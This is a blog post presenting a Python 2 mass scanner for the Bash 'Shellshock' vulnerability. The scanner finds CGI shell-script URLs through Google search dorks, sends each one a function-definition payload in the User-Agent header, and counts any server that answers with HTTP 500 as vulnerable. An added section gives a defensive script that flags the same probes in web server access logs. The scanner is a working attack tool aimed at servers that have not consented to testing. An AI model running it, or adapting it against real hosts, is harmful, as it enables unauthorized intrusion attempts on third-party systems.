The Bash remote code execution vulnerability is really much more powerful than Heartbleed, but its impact is not as broad. The end of yesterday's article, "Bash Remote Code Execution Vulnerability Analysis", mentioned the problem of checking for the vulnerability in bulk.
One of the easiest ways to do this is to use search-engine hacking techniques; here I use Google hacking syntax together with the Google API to crawl for links. Within the country, though, a proxy has to be added.
The proxy in the program is my local goagent proxy, on port 8087. Detecting the vulnerability is also very simple: here I judge directly from the server's return code.
That is the idea. As usual, the code follows:
```python
# coding=utf-8
# Python 2 script (uses xrange, print statements and "except X, e").
import json
import socket
import sys
import threading

import requests

vul_res = []


class GoogleUrlProvider():
    def __init__(self, pagecount, proxies):
        self.pagecount = pagecount  # number of result pages to query
        self.keywords = r'inurl:cgi-bin filetype:sh'
        self.apiurl = 'https://ajax.googleapis.com/ajax/services/search/web'
        self.proxies = proxies

    def getrequest(self, url):
        return requests.get(url, proxies=self.proxies, verify=False)

    def geturls(self):
        ret_list = []
        tmp_list = []
        for x in xrange(0, self.pagecount):
            url = "{apiurl}?v=1.0&q={keywords}&rsz=8&start={pagecount}".format(
                apiurl=self.apiurl, keywords=self.keywords, pagecount=x)
            try:
                r = self.getrequest(url)
                results = json.loads(r.text)
                if not results:
                    continue
                infos = results['responseData']['results']
                if infos:
                    for i in infos:
                        tmp_list.append(i['url'])
            except Exception, e:
                continue
        ret_list = ret_list + tmp_list
        return ret_list


class BashRceDetector():
    def __init__(self, urls):
        self.urls = urls

    def detector(self):
        global vul_res
        for x in self.urls:
            # One worker thread per URL (joined immediately, so the checks
            # run one at a time).
            each = EachWorker(x)
            each.start()
            each.join()


'''Thread work class'''
class EachWorker(threading.Thread):
    def __init__(self, url):
        threading.Thread.__init__(self)
        self.url = url

    def run(self):
        global vul_res
        useragent_header = {'User-Agent': "() { 1;}; echo 'eee'"}
        try:
            r = requests.get(self.url, headers=useragent_header, timeout=8)
            # Judged by the server's return code only.
            if r.status_code == 500:
                print '{url} has Bash RCE vulnerability'.format(url=self.url)
                vul_res.append(self.url)
            else:
                pass
        except socket.timeout, e:
            pass
        except requests.exceptions.Timeout, e:
            pass
        except requests.exceptions.ConnectionError, e:
            pass


if __name__ == '__main__':
    print 'Powered by: Exploit QQ:739858341'
    print 'This was a program which can use to scan the bashrce vulnerability\nscanner working,please ...'
    if len(sys.argv) != 2:
        print 'Usage: python bashrcescanner <google pagecount>'
        sys.exit()
    # goagent proxy
    # Change this to the proxy you use
    proxies = {'http': 'http://127.0.0.1:8087', 'https': "http://127.0.0.1:8087"}
    url_res = []
    vul_guys = []
    urlgetter = GoogleUrlProvider(int(sys.argv[1]), proxies)
    url_res = urlgetter.geturls()
    bash_detector = BashRceDetector(url_res)
    bash_detector.detector()
    if len(vul_res) == 0:
        print 'This group have no vulnerability'
    else:
        print 'Find %d poor host(s)' % len(vul_res)
```
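Seen from the receiving server, the request this script sends is easy to recognise in access logs. The following is an added example, not part of the original post: it reads combined-format access log lines, flags requests whose User-Agent or Referer begins with `() {`, and lists first the sources whose probe was answered with HTTP 500. The log lines are constructed, and the function names and the extra Referer check are assumptions of this example.

```python
import re

# Apache/nginx "combined" format; logged header values may contain \" escapes.
LOG_RE = re.compile(
    r'(?P<host>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>(?:[^"\\]|\\.)*)" '
    r'"(?P<agent>(?:[^"\\]|\\.)*)"'
)
# An unpatched bash imports an environment variable as a function when its value
# starts with these four characters; CGI copies request headers into variables.
FUNC_PREFIX = "() {"

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [26/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status.sh HTTP/1.1" 500 612 "-" "() { 1;}; echo 'eee'"
198.51.100.4 - - [26/Sep/2014:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.7 - - [26/Sep/2014:10:01:09 +0000] "GET /cgi-bin/env.sh HTTP/1.1" 200 88 "() { 1;}; echo 'eee'" "curl/7.38.0"
192.0.2.55 - - [26/Sep/2014:10:02:00 +0000] "GET /cgi-bin/test.sh HTTP/1.1" 404 209 "-" "() { 1;}; echo 'eee'"
""".splitlines()


def find_probes(lines):
    """Return one record per request whose User-Agent or Referer starts like a function."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format: skip rather than guess
        for field in ("agent", "referer"):
            if m.group(field).lstrip().startswith(FUNC_PREFIX):
                # The scanner on this page reads HTTP 500 as "vulnerable", so a
                # probe that was answered with 500 is the first one to triage.
                hits.append({"host": m.group("host"), "path": m.group("path"),
                             "field": field, "got_500": m.group("status") == "500"})
                break
    return hits


def summarize(hits):
    """Group probed paths by source host; sources that were answered with 500 sort first."""
    by_host = {}
    for h in hits:
        entry = by_host.setdefault(h["host"], {"paths": [], "got_500": False})
        entry["paths"].append(h["path"])
        entry["got_500"] = entry["got_500"] or h["got_500"]
    return sorted(by_host.items(), key=lambda kv: not kv[1]["got_500"])


if __name__ == "__main__":
    for host, info in summarize(find_probes(SAMPLE_LOG)):
        print(host, info)
```

A 500 in the log only shows that the response broke, so the script named in a flagged request still has to be checked against the installed bash version.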